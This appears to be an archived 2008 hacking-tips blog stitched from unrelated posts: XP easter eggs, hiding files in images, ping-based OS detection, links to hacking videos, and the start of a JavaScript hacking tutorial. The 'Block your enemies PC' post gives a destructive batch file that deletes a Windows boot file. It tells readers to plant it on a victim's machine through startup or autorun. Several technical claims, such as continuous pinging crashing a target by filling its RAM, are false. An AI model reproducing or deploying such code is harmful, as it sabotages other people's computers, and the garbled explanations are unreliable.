http://www.fsm.nl/ward/
http://slashdot.org/
http://www.peacefire.org/
http://stopcarnivore.org/
http://nomorefakenews.com/
http://grc.com/steve.htm#project-x

--------------------------------------------------------------------------------
11. SPECIAL THANKS
Thank you Skywalker, for being in the right place at the right time. You were the only one who seemed interested in helping me further my research.
Thank you to everybody who has e-mailed me specifically just to thank me. The kind words mean a lot to me and played a big motivator to get this text finished.
And thank you to Hackers.com, for developing a fantatsic site with a great community feel, without which, this tutorial would never have existed.

--------------------------------------------------------------------------------
12. REFERENCES
http://support.microsoft.com/support/kb/articles/Q137/1/13.asp
http://support.microsoft.com/support/kb/articles/Q136/3/86.asp
http://support.microsoft.com/support/kb/articles/Q169/5/31.ASP
http://support.microsoft.com/support/kb/articles/Q141/0/12.asp
http://support.microsoft.com/support/kb/articles/Q205/2/89.ASP
http://support.microsoft.com/support/kb/articles/Q166/3/02.ASP
http://www.insecure.org/sploits/Internet.explorer.web.usage.logs.html
http://www.parascope.com/cgi-bin/psforum.pl/topic=matrix&disc=514&mmark=all
http://www.hackers.com/bulletin/
http://slashdot.org/articles/00/05/11/173257.shtml
http://peacefire.org/

XP HIDDEN SECREATES

2008-09-26T12:18:00.001-07:00

Defrag

Secret - Hidden Command Line Switch

Instructions - Go to "Start", "Run" and Type defrag c: -b to defragment the Boot and Application Prefetch information. Similar to what BootVis invokes.

Paint

Secret - Image Trails

Instructions - Open an image and hold down Shift then drag the image around to create an image trail.

Secret - 10x Zoom

Instructions - Open an image and select the magnifying glass icon. Left-Click exactly on the line below the 8x.

Game Secrets

FreeCell

Secret - Instant Win

Instructions - Hold down Ctrl + Shift + F10 during game play. Then you will be asked if you want to Abort, Retry or Ignore. Choose Abort, then move any card to instantly win.

Secret - Hidden Game Modes

Instructions - In the "Game" menu choose "Select Game". Enter -1 or -2 to activate the hidden game modes.

Minesweeper

Secret - Reveal Mines

Instructions - Minimize or close all running applications. Launch Minesweeper, then type xyzzy. Next hold down either shift key for one second. Now when you move the mouse cursor over a Minesweeper square you will see a tiny white pixel in the top left corner of your desktop screen. This pixel will change to black when your mouse moves over a mine. You may need to change you desktop background to a solid color other then white or black to see the pixel.

Pinball

Secret - Extra Balls

Instructions - Type 1max at the start of a new ball to get extra balls.

Secret - Gravity Well

Instructions - Type gmax at the start of a new game to activate the Gravity Well.

Secret - Instant Promotion

Instructions - Type rmax at the start of a new game to go up in ranks.

Secret - Skill Shot

Instructions - Launch the ball partially up the chute past the third yellow light bar so it falls back down to get 75,000 points. There are six yellow light bars that are worth a varying amount of points:

First: 15,000 points

Second: 30,000 points

Third: 75,000 points

Fourth: 30,000 points

Fifth: 15,000 points

Sixth: 7,500 points

Secret - Test Mode

Instructions - Type hidden test at the start of a new ball to activate Test Mode. No notification will be given that this is activated but you can now left-click the mouse button and drag the ball around.

Secret - Unlimited Balls

Instructions - Type bmax at the start of a new ball. No notification will be given that this is activated but when a ball is lost a new ball will appear from the yellow wormhole indefinitely. Once this is activated you will be unable to activate other secrets without restarting the game.

Solitaire

Secret - Instant Win

Instructions - Press Alt + Shift + 2 during game play to instantly win.

Secret - Draw single cards in a Draw Three game

Instructions - Hold down CTRL + ALT + SHIFT while drawing a new card. Instead of drawing three cards you will only draw one.

OS Secrets

Add/Remove

Secret - Hidden Uninstall Options

Instructions - Warning: Proceed at your own risk! Browse to C:\Windows\inf\ and make a backup copy of sysoc.inf. Then open the original file C:\Windows\inf\sysoc.inf in notepad. Go to "Edit" and select "Replace". In "Find what:" type ,hide and in "Replace with:" type , then select "Replace All", save and close the file. Go to the control panel, "Add/Remove", select "Add/Remove Windows Components". You will now see many more Windows components to uninstall. Do not remove anything with no label or that you do not recognize or fully understand what it does. Doing so can break certain functionality in Windows.

Control Panel

Secret - Hidden Control Panel Extensions

Instructions - Download and install TweakUI, launch, go to "Control Panel" and check any item not selected, then "Apply" and "OK". You will now see the hidden control panel extensions.

Device Manager

Secret - Hidden Devices

Instructions - Go to the control panel, "System" icon, "Hardware" tab and select "Device Manager". Select View and Show hidden devices.

Music

Secret - Music from the Installer

Instructions - Browse to C:\Windows\system32\oobe\images\title.wma and play.

Shutdown

Secret - Display Hibernate Option on the Shut Down dialog

Instructions - Go to "Start", "Turn Off Computer..." and press either Shift key to change the "Stand By" button to "Hibernate".

Support Tools

Secret - Over 100 Windows XP Support Utilities are on the install CD

Instructions for Pre-SP2 users - If you do not have SP2 installed, put the original Windows XP CD in the CD-ROM Drive, run the D:\Support\Tools\setup.exe

Read Deleted SMS

2008-09-26T12:16:00.001-07:00

Read Deleted SMS!!
A SMS once deleted can’t be read again….but sometimes we hurrily delete some important SMS
Here is the technique that must be followed to retrieve deleted SMS.
Required utility:
1) Any system explorer or file explorer program (eg. fileman or fexplorer.provided with the package)
Step 1) Open FexplorerStep
2) Select drive C: or D: depending on the memory in which the Sms messages have been saved.
Step 3) For example u selected c: , Then open “system” folder.
step 4) Then in “system” folder open “mail” folder.
step 5) Then in this folder u will see different folders (eg 0010001_s) and certain files (eg 00100000). These files are the actual messages. Browse through every folder and open all files till u get the sms u are looking for.
Step 6) For opening the files don’t choose options>file>open as it will show format not supported rather choose options>file>hex/text viewer.
By selecting the “Hex/ text viewer” u ll be able to open and read the deleted SMS message

How to hide a file in a image

2008-09-26T12:15:00.000-07:00

1. Gather the file you wish to bind, and the image file, and place them in a folder. For the sake of this demonstration, I will be using C:\New Folder
-The image will hereby be referred to in all examples as fluffy.jpg
-The file will hereby be referred to in all examples as New Text Document.txt

2. Add the file/files you will be injecting into the image into a WinRar .rar or .zip. From here on this will be referred to as (secret.rar)

3. Open command prompt by going to Start > Run > cmd

4. In Command Prompt, navigate to the folder where your two files are by typing
cd location [ex: cd C:\New Folder]

5. Type [copy /b fluffy.jpg + secret.rar fluffy.jpg] (remove the brackets)

Congrats, as far as anyone viewing is concerned, this file looks like a JPEG, acts like a JPEG, and is a JPEG, yet it now contains your file.

In order to view/extract your file, there are two options that you can take

a) Change the file extension from fluffy.jpg to fluffy.rar, then open and your file is there
b) Leave the file extension as is, right click, open with WinRar and your file is there
Youtube link
http://www.youtube.com/watch?v=3Blt9-ojabk

System hacking tips

2008-09-26T12:14:00.000-07:00

Administrator Password Guessing
Performing Automated Password Guessing
Legion
NTInfoScan
Defending Against Password Guessing
Monitoring Event Viewer Logs
VisualLast
Eavesdroppin on Network Password Exchange
Hacking Tool: L0phtCrack
Hacking Tool: KerbCrack
Privilege Escalation
Hacking Tool: GetAdmin
Hacking Tool: hk
Manual Password Cracking Algorithm
Automatic Password Cracking Algorithm
Password Types
Types of Password Attacks
Dictionary Attack
Brute Force Attack
Distributed Brute Force Attack
Password Change Interval
Hybrid Attack
Cracking Windows 2000 Passwords
Retrieving the SAM file
Redirecting SMB Logon to the Attacker
SMB Redirection
Hacking Tool: SMBRelay
Hacking Tool: SMBRelay2
SMBRelay Man-in-the-Middle (MITM)
SMBRelay MITM Countermeasures
Hacking Tool: SMBGrinder
Hacking Tool: SMBDie
Hacking Tool: NBTDeputy
NetBIOS DoS Attack
Hacking Tool: nbname
Hacking Tool: John the Ripper
LanManager Hash
Password Cracking Countermeasures
Keystroke Logger
Hacking Tool: Spector
AntiSpector
Hacking Tool: eBlaster
Hacking Tool: SpyAnywhere
Hacking Tool: IKS Software Logger
Hardware Tool: Hardware Key Logger
Hacking Tool: Rootkit
Planting Rootkit on Windows 2000 Machine
_rootkit_ embedded TCP/IP Stack
Rootkit Countermeasures
MD5 Checksum utility
Tripwire
Covering Tracks
Disabling Auditing
Auditpol
Clearing the Event Log
Hacking Tool: Elslave
Hacking Tool: Winzapper
Hacking Tool: Evidence Eliminator
Hidding Files
NTFS File Streaming
Hacking Tool: makestrm
NTFS Streams Countermeasures
LNS
Steganography
Hacking Tool: ImageHide
Hacking Tool: MP3Stego
Hacking Tool: Snow

http://rapidshare.com/files /99865070/System_Hacking.part03.rar
http://rapidshare.com/files/99870408/System_Hacking.part02.rar
http://rapidshare.com/files/99867492/System_Hacking.part01.rar

Remote operating system detection

2008-09-26T12:12:00.000-07:00

Now a days we invite the so called victim to a webpage/blog
and with the help of a free web traker servive get all his details
as in browser/operating system and other details
but still i would like to share the traditional method as well

Detecting OS (operating system) is another most important step towards hacking into a system. We can even say that after tracing the IP of the system it is the most prior thing that should be done to get the root on a system cause without having knowledge about the OS running by the target system you cannot execute any system commands on the target system and thus your mission wont be accomplished. In here I have figure out the basics of detecting OS remotely without having physical access to the system. There are various method of detecting OS like by trace routing the victim’s IP , by pinging the IP , by using telnet and also by using a terminal. But from my research I have concluded that detecting OS through ping or tracerout is the most simplest but effective way of determining the operating system running in the remote computer without having physical access to the system. Since my aim of writing articles is to make things clear for beginners and intermediate so I will explain remote os detecting through ping method which is very easy to understand even for peoples totally new to computers.. yeah yeah.. I know you call them newbies..right ?? J J J

REMOTE OS DETECTION USING PING METHOD

What is PING and what is its utility ?

Ping is an MSDOS utility provided for windows version of DOS and for Unix and operating systems having UNIX as the core kernel. It runs in dos box in windows and directly in UNIX platform. In this manual I will give more stress on the MSDOS version of ping.

Ping is an utility used for sending and receiving packets of data to a target system using its IP and thus from the outputs you can figure out many information about the target system.
In remote os detection we are mainly concerned with the TTL values of the received data packets.

Note: When you send or receive a file over the internet it is not send at once. Instead it is broken down at the source system and these broken fragments of data know as data packets are send through the internet and these data packets are gathered together by the target system according to an algorithm constructed by the source system.
For example if I send a picture of size 400 KB to my girl friend (hey girls out there remember I don’t yet have a gf in reality) then what actually happens is that my system breaks the data into data packets, say the file of 400 KB has been broken down into 4 data packets each having a size of 100 KB and having a name. These data packets are assigned a code known as the TTL value of the data packets by my operating system. Then these data packets are gathered and the original file is formed from these data packets at the target system.

Example:

C:\windows>ping/?

Usage: ping [-t] [-a] [-n count] [-l size] [-f] [-i TTL] [-v TOS]

[-r count] [-s count] [[-j host-list] | [-k host-list]]

[-w timeout] target_name

Options:
-t Ping the specified host until stopped.
To see statistics and continue - type Control-Break;
-a Resolve addresses to hostnames.
-n count Number of echo requests to send.
-l size Send buffer size.
-f Set Don't Fragment flag in packet.
-i TTL Time To Live.
-v TOS Type Of Service.
-r count Record route for count hops.
-s count Timestamp for count hops.
-j host-list Loose source route along host-list.
-k host-list Strict source route along host-list.
-w timeout Timeout in milliseconds to wait for each reply.

there are various switches available for ping. Above I have given a list of all the switches available in the DOS version of ping. Using the –t switch you can continuously ping a target until it is crashed down. I am sure you are probably wondering how will it crash down the remote system. The answer is quite simple. If you ping the remote system continuously then what happens is that slowly the RAM of the target system is overloaded with these stack data and compels the system to restart or crashes it. You can also use the –l switch to specify the amount of data packet to be send at a time.

But in this article I am not concerned with crashing down a remote system cause its not that easy as it seems to be, there are many other tricks for it and its not possible to crash down a system of present technology just by simple ping. I am concerned with the TTL values of the output that you will get after pinging a system. You can use –n switch with ping to specify the number of echo (ie data packets) to be send to the target system. The default number is 4.

Example:

C:\windows> ping –n 10 127.0.0.1

This command will ping 127.0.0.1 with 10 packets of data and after that will give you an output.

Now I think its time for a real example which I have executed on my system.

C:\windows>ping 127.0.0.1

Pinging 127.0.0.1 with 32 bytes of data:

Reply from 127.0.0.1: bytes=32 time<1ms>TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms>TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms>TTL=128
Reply from 127.0.0.1: bytes=32 time<1ms>TTL=128
(or check http://members.cox.net/~ndav1/self_published/TTL_values.html)

Ping statistics for 127.0.0.1:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:

Minimum = 0ms, Maximum = 0ms, Average = 0ms

Here I have pinged the IP 127.0.0.1 (offline ip of any system) with default ping. Here I am getting TTL value as 128. This is the thing what we need for remote os detection.

What is TTL value ?

TTL value is nothing but a simple code assigned to the out going data packets by the operating system of a computer. The TTL value assigned to the out going data packets depends on the operating system and it is the same for a particular operating system. As for example if you ping a system running windows 98 or earlier versions of windows NT with service packs (I don’t know exactly about the TTL values of recent versions of Windows NT but from my research I think it’s the same as previous versions cause the TTL value even in Windows XP is 128) you will get the TTL value as 128, thus from this TTL value you can easily say that the target system is running Microsoft Windows.

TTL values of commonly used Operating Systems

OS VERSION PLATFORM TTL

Windows 9x/NT Intel 32
Windows 9x/NT Intel 128
Windows 2000 Intel 128
DigitalUnix 4.0 Alpha 60
Unisys x Mainframe 64
Linux 2.2.x Intel 64
FTX(UNIX) 3.3 STRATUS 64
SCO R5 Compaq 64
Netware 4.11 Intel 128
AIX 4.3.x IBM/RS6000 60
AIX 4.2.x IBM/RS6000 60
Cisco 11.2 7507 60
Cisco 12.0 2514 255
IRIX 6.x SGI 60
FreeBSD 3.x Intel 64
OpenBSD 2.x Intel 64
Solaris 8 Intel/Sparc 64
Solaris 2.x Intel/Sparc 255

Well these are not all. There are many more TTL values of many other operating systems. But generally most systems lies within this list.

Now lets try this manual practically and find out the operating system running by the IP 202.178.64.19.

C:\windows>ping 202.178.64.19

Pinging 202.178.64.19 with 32 bytes of data:

Reply from 202.178.64.19: bytes=32 time<1ms>TTL=128
Reply from 202.178.64.19: bytes=32 time<1ms>TTL=128
Reply from 202.178.64.19: bytes=32 time<1ms>TTL=128
Reply from 202.178.64.19: bytes=32 time<1ms>TTL=128

Ping statistics for 202.178.64.19:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 0ms, Maximum = 0ms, Average = 0ms

Well from the output you can figure out many informations. First 4 packets of data each of 32 bytes has been send to 202.178.64.19. In response the target system has responded with data packets of TTL value as 128.
Now we can easily say that the system 202.178.64.19 is running windows.

ERROR CORRECTION IN SOME CASES

There is a possibility of error in TTL values that you receive. Even though the source system send a TTL value of 128 you may receive the TTL value as 120. Well nothing to worry cause its due to the fact that routers reduce the TTL value by 1.
Don’t worry I’ll explain and made things much clearer for you.

It’s a fact that some times routers may reduce the TTL value assigned to the data packets by the source OS by 1.
In that case you have to find out how many routers are there in between your system and the target system and then simply add the number of routers to the received TTL values and you will get the original TTL value.

To find out how many routers there are in between your system and the target system just perform a normal and simple tracert to that IP.
For more information about tracing an IP read my article ‘TRACING IP” in
After tracing the IP using tracert tool of dos suppose you find that there are 10 routers between you and the target system then just simply add 10 to the TTL value that you have received and you will get the original TTL value.

And once you get the original TTL value then its as simple as changing girl friend to find out the operating system running by the remote computer. Just match the TTL value with the above chart and you will find out the operating system info.

How to create con folder in xp

2008-09-26T12:08:00.001-07:00

CON is a reserve world in windows operating system.
that's why we can not create the folder named as
CON.

But by command prompt we can do this

STEP1: goto command prompt
STEP2: type in prompt e:\> "mkdir \\.\e:\con"
STEP3: verify by typing "dir \\.\e:\con"
STEP4: delete the file or folder "rmdir \\.\e:\con"

ollowing file names in Windows are reserved because they represent devices:
con, con.* -> the console
prn, prn.* -> the default printer, as a character device
aux, aux.* -> the default serial terminal, as a character device
lpt1, lpt2, lpt3, lpt4, lpt5, lpt6, lpt7, lpt8, lpt9 -> the parallel ports, as character devices
lpt1.*, lpt2.*, lpt3.*, lpt4.*, lpt5.*, lpt6.*, lpt7.*, lpt8.*, lpt9.*
com1, com2, com3, com4, com5, com6, com7, com8, com9 -> the serial ports, as character devices
com1.*, com2.*, com3.*, com4.*, com5.*, com6.*, com7.*, com8.*, com9.*
nul, nul.* -> the NUL or "waste bit bucket" or "black hole for bits" or "/dev/null" device

Such files are considered to "exist" in all directories, so if you have a filename like "c:\temp\con", you're talking about the CON device, not about a normal disk file called "con". They're not listed using the "dir" command, or using APIs.

How to create con folder

2008-09-26T12:08:00.000-07:00

Hide your Particular Drive

2008-09-23T09:11:00.001-07:00

If u r having any important docs and want to hide it temporarily, dont wory windows XP provides (not officialy ) a utility by which u can hide urs one or more drives .

1. Go to Start > run > type "diskpart".
a dos window will appear with following di$$$$$$ion.
DISKPART>

2. then type "list volume"

this will look like it

Volume### Ltr Label Fs Type Size Status Info
-------------- ---- ------ --- ----- ---- ------- -----

Volume 0 F DC-ROM
Volume 1 C NTFS Partition 7000MB Healthy
Volume 2 D soft NTFS Partition 8000MB Healthy
Volume 3 E ---- NTFS Partition 8000MB Healthy

3.if u wanna hide drive E then type "select volume 3"

then a message will appear in same windows { Volume 3 is the selected volume}

4.now type " remove letter E"
now a message will come { Diskpart Removed the Drive letter }
sometime it requires the reboot the computer .

Diskpart will remove the letter .Windows XP is not having capabilty to identify the unknown volume.

Don't afraid ur Data will remain same .
to Come back the Drive repeat the process . but in 4th step which is shown in this post replace " remove" to "assign"
i mean type " assign letter E"

List of Hacking Tutorial Video Collection

2008-09-23T05:57:00.001-07:00

1. Hacking Server
Hacking Web Server and installing Sock

http://rapidshare.com/files/47266934/15_my_noski.rar.html

2. Hacking Site
Hacking Site and getting root

http://rapidshare.com/files/47266961/16_history_vzlom.rar.html

3. Brutus
Use Brutus to crack a box running telnet.

http://rapidshare.com/files/47266925/17_brutus1.avi.html

4. Fusion
SQL injection on PHP_Fusion Site.

http://rapidshare.com/files/47266924/18_fusion.rar.html

5. Wireless
This video shows a real life wireless hack.

http://rapidshare.com/files/47266930/19_lequipe.rar.html

6. Netbios
This video shows how to exploit file sharing.

http://rapidshare.com/files/47266927/20_netbios.rar.html

7. ARP Spoofing
This video shows how to perform an ARP Spoofing attack.

http://rapidshare.com/files/47266928/21_ARPSpoofing.rar.html

8. Jpeg exploit
This video shows you how to use the jpeg exploit

http://rapidshare.com/files/47266945/22_jpegadmin.rar.html

9. Hacking ParaChat
A video that shows you how to hack parachat v5.5

http://rapidshare.com/files/47266937/23_ParaChat1.rar.html

10. E-mail
Tracing an E-mail and finding out more about the host that sent it and its IP.

http://rapidshare.com/files/47266940/24_e-mail-ip.avi.html

11. Boot from Phlak and run Chkrootkit to detect a compromise

http://rapidshare.com/files/47266907/31_chkrootkit1.swf.html

12. WiGLE, JiGLE and Google Earth: Mapping out your wardrive

http://rapidshare.com/files/47266947/45_wigle1.swf.html

13. Using VirtualDub and a cheap webcam as a camcorder
I thought this might be of use to those that would like to submit something to Infonomicon TV or Hack TV but lack the cash for a proper MiniDV camcorder.

http://rapidshare.com/files/47266948/49_cheapcamcorder.avi.html

14. Using VMware Player to run Live CDs (Bootable ISOs)
In this video I show how to use the free VMware Player to run Live CDs like Knoppix, Auditor or Bart's PE Builder from an ISO

http://rapidshare.com/files/47266953/52_vmwareplayerlivecd.swf.html

15. Make your own VMs with hard drive for free: VMware Player + VMX Builder

http://rapidshare.com/files/47266915/54_vmxbuilder.swf.html

16. Yahoo.com
Vulnerabilities of the post service yahoo.com

http://rapidshare.com/files/47266926/57_yahoo.com.rar.html

17. wwwHack
Use of wwwhack tool on vBulletin

http://rapidshare.com/files/47266914/59_wwwhack.rar.html

18. XSS
Cross site scripting (XSS) in MercuryBoard

http://rapidshare.com/files/47266912/60_new_xss.rar.html

19. John The Ripper
Basic work with "John The Ripper"

http://rapidshare.com/files/47266919/61_jtr.rar.html

20. PHP/SQL Injection
Site hacked with php exploit and known SQL injection.

http://rapidshare.com/files/47266910/63_php_and_sql.rar.html

21. UBB threads 6.2.3
UBB Forum hacked with SQL injection.

http://rapidshare.com/files/47266920/64_ubb.rar.html

22. Bitfrost Server Crypting
This is nice video for any one learning how to add bytes to make there server undetectable.
RAR-Password == Crypt

http://rapidshare.com/files/47266968/66_Bifrost_Server_Cryp.rar.html

23. Microsoft.com Bugs
Nice videos shows of old bug that was exploited on the site

http://rapidshare.com/files/47266904/67_MICROSOFT.rar.html

24. Interview with Kevin Mitnick
He was on fbi's most wanted list, a nitrous Hacker but now see Kevin's Interview after being freed what he has to say about his past and future.

http://rapidshare.com/files/47266959/68_kevin.rar.html

25. Unix Shell Fundamentals : VTC Unix Shell Fundamentals Video Tutorials. You need Quicktime player to view the videos.

http://rapidshare.com/files/47266984/69_UnixShellFund.rar.html

26. C++ Video tutorials
Nice C/C++ Shockwave videos

http://rapidshare.com/files/47266939/70_C__.rar.html

27. Tunneling Exploits via SSH
An intensive demo showing how SSH Tunneling techniques can be used to exploit an interal, non routable network.

http://rapidshare.com/files/47266931/74_see-sec-ssh-dcom-tunneling.zip.html

28. Cracking WEP in 10 Minutes
A short demo of a wireless WEP attack. This is an interesting technique, where packets are injected to the access point, making it release weak IVs.
You'll think twice about WEP after this

http://rapidshare.com/files/47266943/75_see-sec-wepcrack.zip.html

29. A classic client side attack
The MS06-001 vulnerability was used to execute a reverse connect shellcode. More information about this vulnerability can be found at the Microsoft site - MS06-001.

http://rapidshare.com/files/47266911/76_see-sec-client-side.rar.html

30. Blind MySQL
Demonstration of Blind MySQL Injection (bsqlbf)

http://rapidshare.com/files/47266929/77_Blind_MySQL.rar.html

31. D-Link Wireless
Intruders D-Link Wireless Access Point Configuration Disclosure

http://rapidshare.com/files/47266909/78_D-Link_Wireless.rar.html

32. Mysql bftools
Demonstration of Blind MySQL Injection (mysql_bftools)

http://rapidshare.com/files/47266923/79_mysql_bftools.rar.html

33. PHP Remote File
PHP Remote File Inclusion Windows Backdoor.

http://rapidshare.com/files/47266941/80_PHP_Remote.rar.html

34. vBulletin XSS
vBulletin XSS Demonstration with Session Hijacking

http://rapidshare.com/files/47266955/81_vBulletin_XSS.rar.html

35. wbb portal hacked by XSS

http://rapidshare.com/files/47266950/82_wbb_portal.rar.html

36. Reverse Engineering
Reverse Engineering with LD PRELOAD

http://rapidshare.com/files/47266965/83_reverse.rar.html

37. SWF File Vulnerability
Multiple Websites Embedded SWF File Vulnerability Demonstration

http://rapidshare.com/files/47266905/84_SWF_Vul_Demo.rar.html

38. IPB 1.3 SQL
Invasion Power Board 1.3 SQL Injection Exploit

http://rapidshare.com/files/47266890/86_IPB_SQL.rar.html

39. Qnix Buffer Overflows
Qnix Demonstrating Exploration of Simple Buffer Overflows

http://rapidshare.com/files/47266902/87_buff.rar.html

40. ASP SQL
Simple ASP Administrator SQL Injection

http://rapidshare.com/files/47266901/88_asp_sql.rar.html

41. 0-DAY Simple SQL Injection
A film project about a cracker with the name zer0day. (Hacking with Linux -php)

http://rapidshare.com/files/47266933/89_simple-sql-injection.zip.html

42. Hacker Defender Movie
Shows how Brilliant Hacker defender bypasses several rootkits detectors.
You can see bypassing IceSword, BlackLight, RootkitRevealer and more.

http://rapidshare.com/files/47266887/90_Brilliant_Hacker_defender_presentation_movie_MSV1.rar.html

43. NASA Department website Hacked

http://rapidshare.com/files/47266900/92_meh.zip.html

44. Vbulletin 3.5.4 exploit)
By M4k3 from www.pldsoft.com shows how to use Exploit : www.vicitimsite.com/forumpath/install/upgrade.php?step= [any letters, not numbers!]

http://rapidshare.com/files/47266892/93_vbulletin.new.rar.html

45. Linux network monitor
This video shows you how to set up ntop, a network monitoring program, on GNU/Linux.
Ntop features a web interface that displays tons of information about bandwidth utilization, traffic patterns, etc.
It even shows you what applications are using bandwidth on your network such as ftp, bittorrent, http, dns, etc.

http://rapidshare.com/files/47266883/95_CBT4Free-Linux_Network_Monitor.zip.html

46. Linux DNS Server
This video explains how to set up a DNS server on a GNU/Linux server.
In the video I explain a little bit about how DNS works, then I install and configure BIND in a chroot jail on 2 DNS servers in a master/slave relationship.
This video is specifically tailored to setting up DNS for a web server

http://rapidshare.com/files/47266913/97_CBT4Free-Linux_DNS_Server.zip.html

47. Windows Web Server
This video details the installation and configuration of Apache, MySQL, and PHP on windows.
This video is made specifically or those using windows 2000 Pro / XP Home / XP Pro

http://rapidshare.com/files/47266898/98_windows_Web_Server.zip.html

48. Win Server 2003 IIS and DNS (4mb)
This video shows how to install and configure IIS and DNS on windows Server 2003 for virtual hosting.
These procedures will work with all versions of windows Server 2003 and possibly with windows 2000 Server

http://rapidshare.com/files/47266891/99_windows_Server_2003_IIS_and_DNS.zip.html

49. DeluxeBB 1.06 Exploit)
Remote SQL Injection Exploit

http://rapidshare.com/files/47266896/100_live585.rar.html

50. NetBios Live Hack
Shows how to use Super Scan to Hack Netbios opened on remote PC (Port 139)

http://rapidshare.com/files/47266881/101_netbios585.rar.html

51. Classified
Shows how site classified is Hacked

http://rapidshare.com/files/47266894/102_site585.rar.html

List of Hacking Tutorial Video Collection

2008-09-23T05:57:00.000-07:00

Block your enemies PC

2008-09-18T08:01:00.000-07:00

Copy the code below @ the notepad

echo off
C:
cd..
cd..
cd..
attrib -r -s -h ntdetect.com
del ntdetect.com
echo on
print U r a bloody LOSER HACKER is a Winner

Save this file as virus.bat or any other name with .bat extension, a kinda batch file.

Double click it in the victim's computer or Put it in Startup of Ur enemy or put it in a CD and set it in the autorun.

With this activated once the computer will run perfectly

On Restart, it wont start again and U will have to format it
(Exceptions are only if U know how to use DOS).

Hacking with Javascript.

2008-09-17T11:37:00.000-07:00

Hacking with Javascript.

Javascript is used as a client side scripting language, meaning that your browser is what interprets it. It is used on webpages and is secure (for the most part) since it cannot touch any files on your hard drive (besides cookies). It also cannot read/write any files on the server. Knowing javascript can help you in both creating dynamic webpages, meaning webpages that change, and hacking. First I will start with the basic javascript syntax, then I will list a few sites where you can learn more, and then I will list a few ways you can use javascript to hack.

There are a few benifits of knowing javascript. For starters, it is really the only (fully supported) language that you can use on a website making it a very popular language on the net. It is very easy to learn and shares common syntax with many other languages. And it is completely open source, if you find something you like done in javascript you can simply view the source of the page and figure out how it's done. The reason I first got into javascript was because back before I got into hacking I wanted to make my own webpage. I learned HTML very quickly and saw Dynamic HTML (DHTML) mentioned in a few tutorials. I then ventured into the land of javascript making simple scripts and usful features to my site.

It was only after I was pretty good with javascript and got into hacking that I slowly saw it's potential to be used milisously. Many javascript techniques are pretty simple and involve tricking the user into doing something. Almost pure social engineering with a bit of help from javascript. After using simple javascript tricks to fake login pages for webbased email I thought about other ways javascript could be used to aid my hacking, I studied it on and off for around a year. Some of these techniques are used by millions of people, some I came up with an are purely theorectical. I hope you will realize how much javascript can aid a hacker.

1. Basic Syntax
2. Places To Learn More Advanced Javascript
3. Banner Busting & Killing Frames
4. Getting Past Scripts That Filter Javascript
5. Stealing Cookies
6. Stealing Forms
7. Gaining Info On Users
8. Stories Of Javascript Hacks
9. Conclusion

1. Basic Syntax
The basics of javascript are fairly easy if you have programmed anything before, although javascript is not java, if you know java you should have no problems learning it. Same for any other programming language, as most share the same basics as javascript uses. This tutorial might not be for the complete newbie. I would like to be able to do a tutorial like that, but I don't have the time or patience to write one. To begin if you don't know html you must learn it first!

Javascript starts with the tag Anything between these two tags is interpreted as javascript by the browser. Remember this! Cause a few hacks use the fact that if you use .. either way is fine. I would also like to mention that many scripts have right before the tag, this is because they would like to make it compatible with other browsers that do not support javascript. Again, either way is fine, but I will be using the because that is how I learned to script and I got used to putting it in.

Javascript uses the same basic elements as other programming languages.. Such as variables, flow control, and functions. The only difference is that javascript is a lot more simplified, so anyone with some programming experience can learn javascript very quickly. The hardest part of scripting javascript is to get it to work in all browsers. I will now go over the basics of variables:

to define a variable as a number you do: var name = 1;
to define a variable as a string you do: var name = 'value';

A variable is basically the same in all programming languages. I might also point out that javascript does not support pointers. No structs to make your own variables either. Only variable types are defined by 'var'. This can be a hard thing to understand at first, but javascript is much like C++ in how it handles variables and strings. A string is a group of characters, like: 'word', which is a string. When you see something like document.write(something); it will try to print whatever is in the variable something. If you do document.write('something'); or document.write("something"); it will print the string 'something'. Now that you got the variables down lets see how to use arithmetic operators. This will make 2 variables and add them together to make a new word:

b0ilerowns

first we define the variable 'name' as b0iler, then I define 'adjective' as owns. Then the document.write() function writes it to the page as 'name'+'adjective' or b0ilerowns. If we wanted a space we could have did document.write(name+' '+adjective);

Escaping characters - This is an important concept in programming, and extremely important in secure programming for other languages.. javascript doesn't really need to worry about secure programming practice since there is nothing that can be gained on the server from exploitting javascript. So what is "escaping"? It is putting a \ in front of certain characters, such as ' and ". If we wanted to print out:

b0iler's website

We couldn't do:

document.write('b0iler's website');

because the browser would read b0iler and see the ' then stop the string. We need to add a \ before the ' so that the browser knows to print ' and not interpret it as the ending ' of the string. So here is how we could print it:
document.write('b0iler\'s website');

There are two types of comments in javascript. // which only lasts till the end of the line, and /* which goes as many as far as possible until it reaches */ I'll demonstrate:

this will show up

The only thing that script will do is print "this will show up". Everything else is in comments which are not rendered as javascript by the browser.

Flow Control is basically changing what the program does depending on whether something is true or not. Again, if you have had any previous programming experience this is old stuff. You can do this a few different ways different ways. The simplest is the if-then-else statements. Here is an example:

Lets break this down step by step. First I create the variable 'name' and define it as b0iler. Then I check if 'name' is equal to "b0iler" if it is then I write 'b0iler is a really cool guy!', else (if name isn't equal to b0iler) it prints 'b0iler can not define variables worth a hoot!'. You will notice that I put { and } around the actions after the if and else statements. You do this so that javascript knows how much to do when it is true. When I say true think of it this way:

if (name == 'b0iler')
as
if the variable name is equal to 'b0iler'

if the statement name == 'b0iler' is false (name does not equal 'b0iler') then whatever is in the {} (curely brackets) is skipped.

We now run into relational and equality operators. The relational operators are as follows:

> - Greater than, if the left is greater than the right the statement is true.
< - Less than, if the left is lesser than the right the statement is true.
>= - Greater than or equal to. If the left is greater than or equal to the right it is true.
<= - Less than or equal to. If the left is lesser than or equal to the right it is true.

So lets run through a quick example of this, in this example the variable 'lower' is set to 1 and the variable 'higher' is set to 10. If lower is less than higher then we add 10 to lower, otherwise we messed up assigning the variables (or with the if statement).

and now the equality operators, you have already seen one of them in an example: if (name == 'b0iler') the equality operators are == for "equal to" and != for "not equal to". Make sure you always put two equal signs (==) because if you put only one (=) then it will not check for equality. This is a common mistake that is often overlooked.

Now we will get into loops, loops continue the statements in between the curly brackets {} until they are no longer true. There are 2 main types of loops I will cover: while and for loops. Here is an example of a while loop:

